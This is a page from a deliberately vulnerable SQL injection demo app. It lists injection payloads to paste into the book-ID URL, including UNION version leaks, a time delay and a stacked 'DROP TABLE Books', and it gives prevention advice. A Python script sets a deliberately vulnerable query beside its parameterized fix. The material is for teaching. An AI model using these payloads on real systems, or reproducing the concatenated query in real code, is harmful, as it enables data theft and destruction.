Book Details - SQL Injection Demo
SQL Injection is a code injection technique in which attacker-controlled input is interpreted as part of a SQL statement, allowing attackers to alter the queries the application sends to its database.
How SQL Injection Works:
When user input is concatenated directly into the SQL text instead of being bound as a parameter:
# Vulnerable query construction (C#):
var sql = "SELECT * FROM Books WHERE Id = '" + userInput + "'";
# If the user enters: 1' OR '1'='1
# the quote in the input closes the string literal and the final query becomes:
SELECT * FROM Books WHERE Id = '1' OR '1'='1'
# which matches every row instead of the one requested.
Try These SQL Injection Payloads in the URL:
Replace the book ID in the URL with these payloads:
# Basic boolean-based injection (the # comment form only works on MySQL; the remaining payloads target SQL Server, where -- ends the line)
1' OR '1'='1
1' OR 1=1 --
1' OR 1=1 #
# Union-based injection
1' UNION SELECT 1,2,3,4,5 --
1' UNION SELECT null,@@version,null,null,null --
# Time-based blind injection (stacked statement; WAITFOR cannot follow a WHERE predicate directly)
1'; IF (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY '00:00:05' --
# Error-based injection
1' AND 1=CONVERT(int, (SELECT @@version)) --
# Stacked query (terminates the statement and appends another) and inline-comment filter evasion
1'; DROP TABLE Books; --
1'/**/OR/**/1=1--
SQL Injection Prevention:
- Parameterized Queries: Bind user input as SQL parameters instead of concatenating it into the query text; this is the primary defense
- Stored Procedures: Use stored procedures that take parameters and do not build dynamic SQL internally
- Input Validation: Validate input against what the route expects (a book ID must be an integer) and reject anything else
- Escape Special Characters: Escape SQL special characters only where parameters are genuinely impossible (for example, dynamic table names); escaping alone is error-prone
- Least Privilege: Run the application under a database account with minimal permissions so a successful injection cannot drop tables or read unrelated data
- ORM Framework: Use Entity Framework or a similar ORM, which parameterizes generated queries by default; raw SQL executed through the ORM still needs parameters
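The concatenation described under "How SQL Injection Works" and the parameterized fix from the prevention list, side by side, as an added example that is not the demo app's own code. It uses Python with an in-memory SQLite database standing in for the ASP.NET/SQL Server app, with a constructed three-row Books table. Because the engine is SQLite, the version payload calls sqlite_version() where the SQL Server payload uses @@version, and the MySQL-only # comment form is not used.

```python
"""Added example: the vulnerable lookup beside its hardened form.

Python/SQLite stand in for the page's ASP.NET/SQL Server demo app so the
example runs offline. Table layout and rows are constructed for the demo.
"""
import sqlite3

# Constructed sample data mirroring the five-column Books table.
SEED_BOOKS = [
    (1, "The Expanse: Leviathan Wakes", "James S.A. Corey", "978-0316129084", 11.49),
    (2, "Neuromancer", "William Gibson", "978-0441569595", 9.99),
    (3, "Snow Crash", "Neal Stephenson", "978-0553380958", 10.49),
]

# The page's payloads, adapted to SQLite where the engine differs.
PAYLOADS = {
    "benign": "1",
    "boolean": "1' OR '1'='1",
    "union": "1' UNION SELECT 1,2,3,4,5 --",
    "version": "1' UNION SELECT null,sqlite_version(),null,null,null --",
}


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed Books rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Books (Id INTEGER PRIMARY KEY, Title TEXT, "
        "Author TEXT, ISBN TEXT, Price REAL)"
    )
    conn.executemany("INSERT INTO Books VALUES (?, ?, ?, ?, ?)", SEED_BOOKS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """The pattern the page warns about: the URL segment is pasted into the
    SQL text, so a quote in the input ends the literal and the rest of the
    input becomes part of the statement."""
    sql = "SELECT * FROM Books WHERE Id = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Hardened form: validate that the route value is an integer, then bind
    it as a parameter so the driver never interprets it as SQL."""
    try:
        book_id = int(user_input)
    except ValueError:
        return []  # a non-numeric id is simply "not found"
    return conn.execute("SELECT * FROM Books WHERE Id = ?", (book_id,)).fetchall()


def run_demo() -> dict:
    """Run every payload through both lookups.

    Returns {payload_name: (rows_from_vulnerable_query, rows_from_safe_query)}.
    """
    conn = make_db()
    return {
        name: (vulnerable_lookup(conn, payload), safe_lookup(conn, payload))
        for name, payload in PAYLOADS.items()
    }


def leaked_version(rows: list) -> bool:
    """True when a UNION row carried the engine version in the Title column."""
    return any(row[1] == sqlite3.sqlite_version for row in rows)


if __name__ == "__main__":
    for name, (vuln_rows, safe_rows) in run_demo().items():
        print(f"{name:8s} vulnerable -> {len(vuln_rows)} row(s); "
              f"parameterized -> {len(safe_rows)} row(s)")
        if name == "version":
            print("         version leaked:", leaked_version(vuln_rows))
```

The boolean payload returns every row from the concatenated query and nothing from the parameterized one; the UNION payloads add attacker-chosen rows, including the engine version, to the vulnerable result only. The stacked DROP TABLE payload is left out because Python's sqlite3 driver refuses multi-statement strings, which is a driver property rather than a defense the application can rely on.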
Test This Vulnerability:
Try modifying the ID parameter in the URL: /Books/Details/{payload}
- Title: The Expanse: Leviathan Wakes
- Author: James S.A. Corey
- Published Date: 06/02/2011
- ISBN: 978-0316129084
- Price: ¤11.49